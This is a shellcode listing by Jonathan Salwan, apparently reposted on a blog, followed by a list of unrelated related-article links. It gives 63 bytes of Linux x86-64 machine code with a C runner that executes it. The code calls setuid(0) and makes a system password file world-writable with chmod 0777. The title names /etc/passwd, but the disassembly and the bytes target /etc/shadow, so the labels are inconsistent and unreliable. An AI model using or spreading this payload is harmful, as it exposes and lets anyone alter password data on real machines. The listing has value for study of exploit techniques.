/*

Title:  Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 byes

Date:   2010-06-17

Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan

Web:    http://shell-storm.org | http://twitter.com/shell_storm

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/

  <-- _setuid(0) -->

  400078:  48 31 ff               xor    %rdi,%rdi

  40007b:  48 31 c0               xor    %rax,%rax

  40007e:  b0 69                  mov    $0x69,%al

  400080:  0f 05                  syscall

  <-- _chmod("/etc/shadow", 0777) -->

  400082:  48 31 d2               xor    %rdx,%rdx

  400085:  66 be ff 01            mov    $0x1ff,%si

  400089:  48 bb ff ff ff ff ff   mov    $0x776f64ffffffffff,%rbx

  400090:  64 6f 77

  400093:  48 c1 eb 28            shr    $0x28,%rbx

  400097:  53                     push   %rbx

  400098:  48 bb 2f 65 74 63 2f   mov    $0x6168732f6374652f,%rbx

  40009f:  73 68 61

  4000a2:  53                     push   %rbx

  4000a3:  48 89 e7               mov    %rsp,%rdi

  4000a6:  48 31 c0               xor    %rax,%rax

  4000a9:  b0 5a                  mov    $0x5a,%al

  <-- _exit(0) -->

  4000ab:  0f 05                  syscall

  4000ad:  48 31 ff               xor    %rdi,%rdi

  4000b0:  48 31 c0               xor    %rax,%rax

  4000b3:  b0 3c                  mov    $0x3c,%al

  4000b5:  0f 05                  syscall

*/

#include <stdio.h>

char *SC =  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"

            "\x48\x31\xd2\x66\xbe\xff\x01\x48\xbb\xff"

            "\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xeb"

            "\x28\x53\x48\xbb\x2f\x65\x74\x63\x2f\x73"

            "\x68\x61\x53\x48\x89\xe7\x48\x31\xc0\xb0"

            "\x5a\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0"

            "\x3c\x0f\x05";

int main(void)

{

        fprintf(stdout,"Length: %d\n",strlen(SC));

        (*(void(*)()) SC)();

return ;

}

Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 byes的更多相关文章

  1. 【Linux】理解setuid()、setgid()和sticky位

    详见: http://blog.csdn.net/m13666368773/article/details/7615125 Linux SETUID机制 (1)进程运行时能够访问哪些资源或文件,不取决 ...

  2. linux(centos8):zabbix配置邮件报警(监控错误日志)(zabbix5.0)

    一,zabbix5.0发邮件报警的准备工作: zabbix5.0在linux平台上的安装:参见这一篇: https://www.cnblogs.com/architectforest/p/129125 ...

  3. 《从LFS到自己的Linux发行版》系列教程:一步到位体验LFS11.0

    ​​ 目录 前言 第一节:LFS 准备工作 第二节:一步完成你的 LFS11.0 第三节:开启你的 LFS 系统 结语 前言 如果你把从源代码开始编译构建一个操作系统的工作当成厨师做一桌菜的话,Lin ...

  4. Linux下Oracle 10.2.0.1升级到10.2.0.4总结

    最近部署测试环境时,将测试环境ORACLE数据库从10.2.0.1升级到了10.2.0.4,顺便整理记录一下升级过程. 实验环境: 操作系统:Oracle Linux Server release 5 ...

  5. 64位centos 下编译 hadoop 2.6.0 源码

    64位os下为啥要编译hadoop就不解释了,百度一下就能知道原因,下面是步骤: 前提:编译源码所在的机器,必须能上网,否则建议不要尝试了 一. 下载必要的组件 a) 下载hadoop源码 (当前最新 ...

  6. 64位CentOS上编译 Hadoop 2.2.0

    下载了Hadoop预编译好的二进制包,hadoop-2.2.0.tar.gz,启动起来后.总是出现这样的警告: WARN util.NativeCodeLoader: Unable to load n ...

  7. 修改linux文件权限命令:chmod 【转载】

    Linux系统中的每个文件和目录都有访问许可权限,用它来确定谁可以通过何种方式对文件和目录进行访问和操作. chmod  命令可以改变所有子目录的权限,下面有2种方法 改变一个文件的权限: chmod ...

  8. 【翻译mos文章】Linux x86 and x86-64 系统SHMMAX最大

    Linux x86 and x86-64 系统SHMMAX最大值 参考原始: Maximum SHMMAX values for Linux x86 and x86-64 (文件 ID 567506. ...

  9. Linux编程 14 文件权限(用户列表passwd,用户控制shadow,useradd模板与useradd命令参数介绍)

    一. 概述 linux安全系统的核心是用户账户. 创建用户时会分配用户ID(UID). UID是唯一的,但在登录系统时不是用UID,而是用登录名.在讲文件权限之之前,先了解下linux是怎样处理用户账 ...

随机推荐

  1. k8s 组件介绍-API Server

    API Server简介 k8s API Server提供了k8s各类资源对象(pod,RC,Service等)的增删改查及watch等HTTP Rest接口,是整个系统的数据总线和数据中心. kub ...

  2. 在Ubuntu custom kernel上裝perf by compile

    Using perf, the Linux Performance Analysis tool on Ubuntu Karmic A lot has been going on with Linux ...

  3. 【翻译自mos文章】oraclepassword管理策略

    oraclepassword管理策略 參考原文: Oracle Password Management Policy (Doc ID 114930.1) 细节: password管理通过使用profi ...

  4. C#简单的文件依赖缓存的使用

    一,FileCache.aspx页面 <%@ Page Language="C#" AutoEventWireup="true" CodeBehind=& ...

  5. Vue小白篇 - ES6的语法

    为什么要学 ES6 的语法呢? 因为 Vue 语法有很多都是 ES6(ECMAScript 6),这里推荐 [阮一峰 ECMAScript 6 入门]: http://es6.ruanyifeng.c ...

  6. 2018-2-13-win10-uwp-从-Unity-创建

    title author date CreateTime categories win10 uwp 从 Unity 创建 lindexi 2018-2-13 17:23:3 +0800 2018-2- ...

  7. Spring Bean 的生命周期,如何被管理的

    1. 实例化一个Bean,也就是我们通常说的new 2. 按照Spring上下文对实例化的Bean进行配置,也就是IOC注入 3. 如果这个Bean实现了BeanNameAware接口,会调用它实现的 ...

  8. 74th Jupyter Notebook 插入图片的方法

    转载: https://account.cnblogs.com/signin?ReturnUrl=http%3A%2F%2Fhome.cnblogs.com%2Fu%2Ferdou%2F   插入本地 ...

  9. 转 Tomcat访问日志详细配置

    配置http访问日志.Tomcat自带的能够记录的http访问日志已经很详细了取消下面这段的注释: <Valve className="org.apache.catalina.valv ...

  10. 0001.第一个多线程demo--分批处理数据

    public class UserEntity { private String userId; private String userName; public String getUserId() ...